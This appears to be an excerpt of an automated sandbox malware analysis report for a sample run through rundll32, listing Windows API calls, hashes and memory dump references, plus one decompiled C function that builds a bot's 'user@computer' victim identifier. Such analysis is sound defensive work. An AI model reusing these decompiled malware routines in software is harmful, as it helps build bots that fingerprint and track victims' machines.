                                • Instruction ID: 5cecd9c605418adfb25842c26e77aa475a03ab71fe0f4e1c8b5e6abed21d1d91
                                • Opcode Fuzzy Hash: d11b61ae3cfb3c3354da4fefffa441e384bc984237e97691067459ded7293070
                                • Instruction Fuzzy Hash: DB11B135500206EFDB01EF65D88989EBBE8FF11260715446BF826EB210D7309C59CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,76C85520,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 0348509E
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850B7
                                • GetCurrentThreadId.KERNEL32 ref: 034850C4
                                • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850D0
                                • GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,03475112,00000000,?,00000000,00000000,?), ref: 034850DE
                                • lstrcpy.KERNEL32(00000000), ref: 03485100
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Temp$FilePathTime$AllocateCurrentHeapNameSystemThreadlstrcpy
                                • String ID:
                                • API String ID: 1175089793-0
                                • Opcode ID: 8d91747adc796b8051e1ff72a32d8c56ac2ae2f0a3137bb92555d127d6d4fc62
                                • Instruction ID: 0e586d35d8356d2b5d8edb5563726d9e8072247a445d5fd9f27a83c52d7f244e
                                • Opcode Fuzzy Hash: 8d91747adc796b8051e1ff72a32d8c56ac2ae2f0a3137bb92555d127d6d4fc62
                                • Instruction Fuzzy Hash: FF016132D102157BD711BBA69C89E6F7BECEF97A40709049BB901EF205DB70D80187B4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,?), ref: 03474FB8
                                • lstrlen.KERNEL32(?,?), ref: 03474FE9
                                • memcpy.NTDLL(00000008,?,00000001), ref: 03474FF8
                                • HeapFree.KERNEL32(00000000,00000000,?), ref: 0347507A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrlenmemcpy
                                • String ID: W
                                • API String ID: 379260646-655174618
                                • Opcode ID: d3def5968631808be4f018c448a553dc7ae437772d38133a671476ce6590159b
                                • Instruction ID: bfceffb7cf1a961a523abb0b97c8d614afbaa7b9d72cded009e34dbe49cdc632
                                • Opcode Fuzzy Hash: d3def5968631808be4f018c448a553dc7ae437772d38133a671476ce6590159b
                                • Instruction Fuzzy Hash: 9741AF301002499FCB25DF6AD884BFABBEDAB16314F09846FE459CF314C7359586CB89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memset.NTDLL ref: 03485A17
                                • FlushFileBuffers.KERNEL32(00000000,?,00000000,00000000), ref: 03485A84
                                • GetLastError.KERNEL32(?,00000000,00000000), ref: 03485A8E
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: BuffersErrorFileFlushLastmemset
                                • String ID: K$P
                                • API String ID: 3817869962-420285281
                                • Opcode ID: bb1d2b99a5a4e2d7485574bdb6b26ad04ceff59d9a3082f759732262a31f16db
                                • Instruction ID: b5bca061744650e53bea91fe0d60c290bfc12c1aafa068f4de7ae8d16ceecf54
                                • Opcode Fuzzy Hash: bb1d2b99a5a4e2d7485574bdb6b26ad04ceff59d9a3082f759732262a31f16db
                                • Instruction Fuzzy Hash: CC418F30A007099FDB21DFA8C9C46AFBBF5FF45600F1889AED486DB680D334A944CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.NTDLL(?,0347DE40,00000000,?,?,?,0347DE40,?,?,?,?,?), ref: 0347D121
                                • lstrlen.KERNEL32(0347DE40,?,?,?,0347DE40,?,?,?,?,?), ref: 0347D13F
                                • memcpy.NTDLL(?,?,?,?,?,?,?), ref: 0347D1AE
                                • lstrlen.KERNEL32(0347DE40,00000000,00000000,?,?,?,0347DE40,?,?,?,?,?), ref: 0347D1CF
                                • lstrlen.KERNEL32(03F8458B,?,?,?,?,?,?,?), ref: 0347D1E3
                                • memcpy.NTDLL(?,03F8458B,00000000,?,?,?,?,?,?,?), ref: 0347D1EC
                                • LocalFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0347D1FA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlenmemcpy$FreeLocal
                                • String ID:
                                • API String ID: 1123625124-0
                                • Opcode ID: e3edea4b531505ea04b7e0efe86359a5ce3f8952875bae22f3ea6c4e6d156768
                                • Instruction ID: 097fc220cbede46f9a0117661401cc5c77a869c712b139e0f8acf48da3642be0
                                • Opcode Fuzzy Hash: e3edea4b531505ea04b7e0efe86359a5ce3f8952875bae22f3ea6c4e6d156768
                                • Instruction Fuzzy Hash: 9741F8B680021AAFDF11DF65DC418DB3FA8EF15260B054566FC18AB211E771DE608BE4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,?,?,03472028,?), ref: 0347867A
                                  • Part of subcall function 03478669: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,03472028,?), ref: 03478697
                                • lstrlenW.KERNEL32(?,00000000,?,?,?), ref: 03472055
                                • lstrlenW.KERNEL32(00000008,?,?,?), ref: 0347205C
                                • lstrlenW.KERNEL32(?,?,?,?,?), ref: 0347207A
                                • lstrlen.KERNEL32(00000000,?,00000000), ref: 03472138
                                • lstrlenW.KERNEL32(?), ref: 03472143
                                • wsprintfA.USER32 ref: 03472185
                                  • Part of subcall function 0348E803: RtlFreeHeap.NTDLL(00000000,?,03483953,?,?,0348BF5B,00000000,00000000,034710B0,00000000,03499F2C,00000008,00000003), ref: 0348E80F
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 0347F3DB
                                  • Part of subcall function 0347F39B: GetLastError.KERNEL32 ref: 0347F3E5
                                  • Part of subcall function 0347F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 0347F40A
                                  • Part of subcall function 0347F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 0347F42D
                                  • Part of subcall function 0347F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 0347F455
                                  • Part of subcall function 0347F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 0347F46A
                                  • Part of subcall function 0347F39B: SetEndOfFile.KERNEL32(00001000), ref: 0347F477
                                  • Part of subcall function 0347F39B: CloseHandle.KERNEL32(00001000), ref: 0347F48F
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Filelstrlen$CreateEnvironmentExpandHeapStrings$AllocateCloseErrorFreeHandleLastObjectPointerSingleWaitWritewsprintf
                                • String ID:
                                • API String ID: 1727939831-0
                                • Opcode ID: 3746d6b79ac71f4c7bf55bd051e957a56282ea27abfc8e502552f5c1ec9a59d7
                                • Instruction ID: f6d07579c9ff2c9815349e0d5eae44615634918cedf0f8cd62b51b8cf3a10ff9
                                • Opcode Fuzzy Hash: 3746d6b79ac71f4c7bf55bd051e957a56282ea27abfc8e502552f5c1ec9a59d7
                                • Instruction Fuzzy Hash: FC516075900209AFCF11EFAADC85DEE7BF9FF48200B04446BE914AF214DB35CA119B64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • memcpy.NTDLL(?,?,00000010,?,?,?,?,?,?,?,?,?,?,03485583,00000000,00000000), ref: 03477E46
                                • memcpy.NTDLL(00000000,00000000,?,0000011F), ref: 03477ED9
                                • GetLastError.KERNEL32(?,?,0000011F), ref: 03477F31
                                • GetLastError.KERNEL32 ref: 03477F63
                                • GetLastError.KERNEL32 ref: 03477F77
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,03485583,00000000,00000000,?,03473EC6,?), ref: 03477F8C
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$memcpy
                                • String ID:
                                • API String ID: 2760375183-0
                                • Opcode ID: bddc69db4bf7df9307bcd1ab664b995e7da8246c94b5ff9faee4d6d9807960e9
                                • Instruction ID: 06be1e6dba7c4cd40f3288bd3f1bc8418f9989980a1691b1d14db778fa301ef3
                                • Opcode Fuzzy Hash: bddc69db4bf7df9307bcd1ab664b995e7da8246c94b5ff9faee4d6d9807960e9
                                • Instruction Fuzzy Hash: 5D515BB1900208BFDB10DFA5DC84AEEBFB8FB08354F14442AF925EA240D7349A55CB64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • lstrcpy.KERNEL32(?,00000020), ref: 0348AEF4
                                • lstrcat.KERNEL32(?,00000020), ref: 0348AF09
                                • lstrcmp.KERNEL32(00000000,?), ref: 0348AF20
                                • lstrlen.KERNEL32(?), ref: 0348AF44
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                                • String ID:
                                • API String ID: 3214092121-3916222277
                                • Opcode ID: 510869af502dbd99c82aba7877bd395183d7c0d3b35e7d0e996c5738039b2dc1
                                • Instruction ID: 525d7715ce111ef36d608bca2813e20eaeb8463e12f78f8eca240f33deb256f6
                                • Opcode Fuzzy Hash: 510869af502dbd99c82aba7877bd395183d7c0d3b35e7d0e996c5738039b2dc1
                                • Instruction Fuzzy Hash: CC51A071E00208EFDF21EF99C9846AEFBB5EF55314F19845BE9159F201C7B0AA41CB94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5A3
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5B4
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5C6
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5D8
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5EA
                                • lstrlenW.KERNEL32(?,03493D54,06169A2B,00000057), ref: 0347D5F6
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrlen
                                • String ID:
                                • API String ID: 1659193697-0
                                • Opcode ID: fdd0eae6ea8063588594de3d8c13f97299b5ee929081ac66f8b105390104c001
                                • Instruction ID: d545f80a697194afc93d0c30631ea8a941910b5057067648cbfdeb2cb488704b
                                • Opcode Fuzzy Hash: fdd0eae6ea8063588594de3d8c13f97299b5ee929081ac66f8b105390104c001
                                • Instruction Fuzzy Hash: E6416171E1020AAFCB60EF99C880AAFF7F9FF99244B18886ED515EB310D770D9058B54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 034824C3: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 034824CF
                                  • Part of subcall function 034824C3: SetLastError.KERNEL32(000000B7,?,03485C3C,?,?,00000000,?,?,?), ref: 034824E0
                                • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00000000,?,?,?), ref: 03485C5C
                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03485D34
                                  • Part of subcall function 0347A976: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 0347A990
                                  • Part of subcall function 0347A976: CreateWaitableTimerA.KERNEL32(0349A1E8,00000001,?), ref: 0347A9AD
                                  • Part of subcall function 0347A976: GetLastError.KERNEL32(?,00000000,03488C06,00000000,00000000,0000801C,?,?,00000000,00000001,00000000,?,00000000,?,?,?), ref: 0347A9BE
                                  • Part of subcall function 0347A976: GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347A9FE
                                  • Part of subcall function 0347A976: SetWaitableTimer.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA1D
                                  • Part of subcall function 0347A976: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,03488C06,00000000,00000000,0000801C), ref: 0347AA33
                                • GetLastError.KERNEL32(?,?,?,00000000,?,?,?), ref: 03485D1D
                                • ReleaseMutex.KERNEL32(00000000,?,?,00000000,?,?,?), ref: 03485D26
                                  • Part of subcall function 034824C3: CreateMutexA.KERNEL32(0349A1E8,00000000,?,?,03485C3C,?,?,00000000,?,?,?), ref: 034824F3
                                • GetLastError.KERNEL32(?,?,00000000,?,?,?), ref: 03485D41
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: ErrorLast$MutexTimerWaitable$CreateOpenTime$CloseFileFreeHandleHeapMultipleObjectsReleaseSystemWait
                                • String ID:
                                • API String ID: 1700416623-0
                                • Opcode ID: 0b3483380385043abb76d9528878f88053f2fcd437c85870c0410f7ad26a54b9
                                • Instruction ID: 0b7b129fe05491e028b6cca1aaca4af7035d1386e99c9612512ea08c1dcfa9de
                                • Opcode Fuzzy Hash: 0b3483380385043abb76d9528878f88053f2fcd437c85870c0410f7ad26a54b9
                                • Instruction Fuzzy Hash: 46318275A002049FCB01FF75D8489AE7BF9EB8A31472589ABE816EF354E7718811CF64
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlImageNtHeader.NTDLL(00000000), ref: 0348C228
                                  • Part of subcall function 0347A698: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,00000208,00000000,00000000,?,?,03477D5E), ref: 0347A6BE
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,034789E4,00000000), ref: 0348C26A
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000001), ref: 0348C2BC
                                • VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,00000000,00000000,?,00000000,00000000,00000001,?,00000000,034789E4,00000000), ref: 0348C2D5
                                  • Part of subcall function 0347E9EC: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 0347EA0D
                                  • Part of subcall function 0347E9EC: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,?,?,?,0348C25B,00000000,00000000,00000000,00000001,?,00000000), ref: 0347EA50
                                • GetLastError.KERNEL32(?,00000000,034789E4,00000000,?,?,?,?,?,?,?,03479100,?), ref: 0348C30D
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Free$AllocAllocateErrorFileHeaderImageLastModuleNameVirtual
                                • String ID:
                                • API String ID: 1921436656-0
                                • Opcode ID: c6f834a49b0193ac39eecb28a9517e258375ab772c9602fe90316cc0c0e9389f
                                • Instruction ID: 66f77bfb883afdb34eb9b2352cf32d4fe3e393161a5731840b191d7982610af0
                                • Opcode Fuzzy Hash: c6f834a49b0193ac39eecb28a9517e258375ab772c9602fe90316cc0c0e9389f
                                • Instruction Fuzzy Hash: D3315E75A00205AFDF11FFA5C881AAEBBB8EF09750F15009BE905AF354D7309D45CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 0347A078
                                • lstrcpy.KERNEL32(00000000,?), ref: 0347A091
                                • lstrcpyn.KERNEL32(00000006,00000000,00000001,?,?,?,?,?,00000000,00000000,00000000), ref: 0347A09E
                                • lstrlen.KERNEL32(0349B3A8,?,?,?,?,?,00000000,00000000,00000000), ref: 0347A0B0
                                • HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,0000000D,00000000,?,?,?,?,?,00000000,00000000), ref: 0347A0E1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateFreelstrcpylstrcpynlstrlen
                                • String ID:
                                • API String ID: 2734445380-0
                                • Opcode ID: 28d39861220580f1bc9327eaf34a77284681c1ca6d7d87a97572c493f3ff892a
                                • Instruction ID: d6dc34b290b7f9a2debbbef774964037e1f91032b4a36ef5a37852c0504af41f
                                • Opcode Fuzzy Hash: 28d39861220580f1bc9327eaf34a77284681c1ca6d7d87a97572c493f3ff892a
                                • Instruction Fuzzy Hash: 7131CF32900248FFCB11EF99DC89EEF7BB8EF05310F14845AF904AA200E7749A55CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • lstrlen.KERNEL32(00000001,00000000,00000000,00000000,03473DA2,00000000,00000001,?,?,?), ref: 0347DD92
                                • lstrlen.KERNEL32(?), ref: 0347DDA2
                                • RtlAllocateHeap.NTDLL(00000000,00000001), ref: 0347DDD6
                                • RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 0347DE01
                                • memcpy.NTDLL(00000000,?,?), ref: 0347DE20
                                • HeapFree.KERNEL32(00000000,00000000), ref: 0347DE81
                                • memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 0347DEA3
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$Allocatelstrlenmemcpy$Free
                                • String ID:
                                • API String ID: 3204852930-0
                                • Opcode ID: 1b371c43ef423dc1b8d55afc7bf44a7edb6c8acf9a4916076d4d149b9960ba09
                                • Instruction ID: d8b1f740972738728d928bec8fc36fb34f9b8b7347f97ae2713e872bedc08cf2
                                • Opcode Fuzzy Hash: 1b371c43ef423dc1b8d55afc7bf44a7edb6c8acf9a4916076d4d149b9960ba09
                                • Instruction Fuzzy Hash: 7D313C72C1060AAFDF12DF65CC809EFBBB9EF15244F18446AE904AB215E731DA148FA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 034870C3: RtlEnterCriticalSection.NTDLL(0349A428), ref: 034870CB
                                  • Part of subcall function 034870C3: RtlLeaveCriticalSection.NTDLL(0349A428), ref: 034870E0
                                  • Part of subcall function 034870C3: InterlockedIncrement.KERNEL32(0000001C), ref: 034870F9
                                • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 03481F04
                                • memcpy.NTDLL(00000000,?,?,?,00000000,?,?,?,?,?,?,?,03488667,?,00000000), ref: 03481F15
                                • lstrcmpi.KERNEL32(00000002,?), ref: 03481F5B
                                • memcpy.NTDLL(00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,03488667,?,00000000), ref: 03481F6F
                                • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,00000000,?,?,?,?,?,?,?,03488667,?,00000000), ref: 03481FB5
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalHeapSectionmemcpy$AllocateEnterFreeIncrementInterlockedLeavelstrcmpi
                                • String ID:
                                • API String ID: 733514052-0
                                • Opcode ID: ab2e91d0846cb17611ddd3db474c5f79cfc13903b6009afa1ad5e90739d84634
                                • Instruction ID: 1d4dfdc4e9ba5183ad8945f2d1f586998efc8ed7ffa10ed28b693664b05d1af3
                                • Opcode Fuzzy Hash: ab2e91d0846cb17611ddd3db474c5f79cfc13903b6009afa1ad5e90739d84634
                                • Instruction Fuzzy Hash: ED31CE76900208AFDB10EFA8D8C8AAE7BF8FF05254F14006BFA05AF201E7349D458B94
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,?), ref: 0348833B
                                • GetComputerNameW.KERNEL32(00000000,?), ref: 03488357
                                  • Part of subcall function 03479394: RtlAllocateHeap.NTDLL(00000000,?,03480051), ref: 034793A0
                                • GetUserNameW.ADVAPI32(76CC81D0,76C85520), ref: 03488391
                                • GetComputerNameW.KERNEL32(?,?), ref: 034883B4
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,76CC81D0,?,00000000,?,00000000,00000000), ref: 034883D7
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 7fc67f6083b7277a074727e328678f78cce7bc84384521f13181e5e978d78a0c
                                • Instruction ID: 22ba32c4ecb2d84b998175daf527dc875befd86ff6692b69675d2a398a9d8500
                                • Opcode Fuzzy Hash: 7fc67f6083b7277a074727e328678f78cce7bc84384521f13181e5e978d78a0c
                                • Instruction Fuzzy Hash: 9A21EA76D00208FFDB11EFE9D9848EEBBBCEF48200B6444AAE505EB241E7309B45DB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                APIs
                                  • Part of subcall function 0348D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,0347243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 0348D58C
                                • RtlEnterCriticalSection.NTDLL(0349A428), ref: 03472454
                                • RtlLeaveCriticalSection.NTDLL(0349A428), ref: 03472467
                                • GetSystemTimeAsFileTime.KERNEL32(?), ref: 03472478
                                • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 034724E3
                                • InterlockedIncrement.KERNEL32(0349A43C), ref: 034724FA
                                Memory Dump Source
                                • Source File: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, Offset: 03470000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3470000_rundll32.jbxd
                                Yara matches
                                Similarity
                                • API ID: CriticalSectionTime$AllocateEnterFileHeapIncrementInterlockedLeaveSystemlstrlen
                                • String ID:
                                • API String ID: 3915436794-0
                                • Opcode ID: da934e0827558b62d2f2caf309ce549c4c6839df5de76d06cc6df1261c6c237c
                                • Instruction ID: def3237cb7f71888f40dc9fd4f847b7f6bc315d5a9e4799ce8e8259bc223bc0b
                                • Opcode Fuzzy Hash: da934e0827558b62d2f2caf309ce549c4c6839df5de76d06cc6df1261c6c237c
                                • Instruction Fuzzy Hash: AE31DD32900305DFC721EF28D84896BBBE8FB89369B15491FF8559B200D770D811CBD9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                 C-Code - Quality: 100%
                                 			// Builds the bot's victim identifier "<user>@<computer>" as a NUL-terminated
                                 			// UTF-8 string in a heap buffer; returns the buffer, or 0 if any step fails.
                                 			E03432A11() {
                                 				long _v8;
                                 				long _v12;
                                 				int _v16;
                                 				long _t39;
                                 				long _t43;
                                 				signed int _t47;
                                 				short _t51;
                                 				signed int _t52;
                                 				int _t56;
                                 				int _t57;
                                 				char* _t64;
                                 				short* _t67;
                                 
                                 				_v16 = 0;
                                 				_v8 = 0;
                                 				GetUserNameW(0,  &_v8);                  // size probe: _v8 receives the required length, NUL included
                                 				_t39 = _v8;
                                 				if(_t39 != 0) {
                                 					_v12 = _t39;
                                 					_v8 = 0;
                                 					GetComputerNameW(0,  &_v8);          // size probe for the computer name
                                 					_t43 = _v8;
                                 					if(_t43 != 0) {
                                 						_t11 = _t43 + 2; // 0x75bcc742
                                 						_v12 = _v12 + _t11;
                                 						// Heap allocation (RtlAllocateHeap inside E03436D63, per the API list below).
                                 						// '+' binds tighter than '<<', so the size is (_v12 + _t11) * 4 bytes: room for
                                 						// the wide staging copy and the UTF-8 result with slack to spare.
                                 						_t64 = E03436D63(_v12 + _t11 << 2);
                                 						if(_t64 != 0) {
                                 							_t47 = _v12;
                                 							_t67 = _t64 + _t47 * 2;          // wide-string staging area, 2*_v12 bytes into the buffer
                                 							_v8 = _t47;
                                 							if(GetUserNameW(_t67,  &_v8) == 0) {
                                 								L7:
                                 								E03436C2C(_t64);                 // failure path; the callee is not expanded in this summary
                                 							} else {
                                 								_t51 = 0x40;                     // '@'
                                 								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;   // overwrite the user name's NUL with '@'
                                 								_t52 = _v8;
                                 								_v12 = _v12 - _t52;
                                 								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {   // computer name goes directly after '@'
                                 									goto L7;
                                 								} else {
                                 									_t56 = _v12 + _v8;                       // total chars: user + '@' + computer
                                 									_t31 = _t56 + 2; // 0x34357e9
                                 									_v12 = _t56;
                                 									// 0xFDE9 = CP_UTF8: encode the wide "user@computer" into the front of the same buffer
                                 									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                 									_v8 = _t57;
                                 									if(_t57 == 0) {
                                 										goto L7;
                                 									} else {
                                 										_t64[_t57] = 0;                      // NUL-terminate; cchWideChar excluded the terminator
                                 										_v16 = _t64;
                                 									}
                                 								}
                                 							}
                                 						}
                                 					}
                                 				}
                                 				return _v16;
                                 			}

                                 Statement addresses (side column of the C code above): 0x03432a1f to 0x03432ae3

                                APIs
                                • GetUserNameW.ADVAPI32(00000000,034357E7), ref: 03432A25
                                • GetComputerNameW.KERNEL32(00000000,034357E7), ref: 03432A41
                                  • Part of subcall function 03436D63: RtlAllocateHeap.NTDLL(00000000,00000000,03435D7B), ref: 03436D6F
                                • GetUserNameW.ADVAPI32(00000000,034357E7), ref: 03432A7B
                                • GetComputerNameW.KERNEL32(034357E7,75BCC740), ref: 03432A9E
                                • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,034357E7,00000000,034357E9,00000000,00000000,?,75BCC740,034357E7), ref: 03432AC1
                                Memory Dump Source
                                • Source File: 00000002.00000002.463452304.0000000003431000.00000020.10000000.00040000.00000000.sdmp, Offset: 03430000, based on PE: true
                                 • Associated: 00000002.00000002.463436277.0000000003430000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463492382.0000000003439000.00000002.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463505403.000000000343A000.00000004.10000000.00040000.00000000.sdmp
                                 • Associated: 00000002.00000002.463526970.000000000343C000.00000002.10000000.00040000.00000000.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_3430000_rundll32.jbxd
                                Similarity
                                • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                • String ID:
                                • API String ID: 3850880919-0
                                • Opcode ID: 603c25818222128ad5a40efc73e4c95c7cfce307bafb2b718bcfca6a196ae667
                                • Instruction ID: a58fd4c84802c9a2329c76e8373e687c669ee3cb40a2f495cafcea877ba8f88c
                                • Opcode Fuzzy Hash: 603c25818222128ad5a40efc73e4c95c7cfce307bafb2b718bcfca6a196ae667
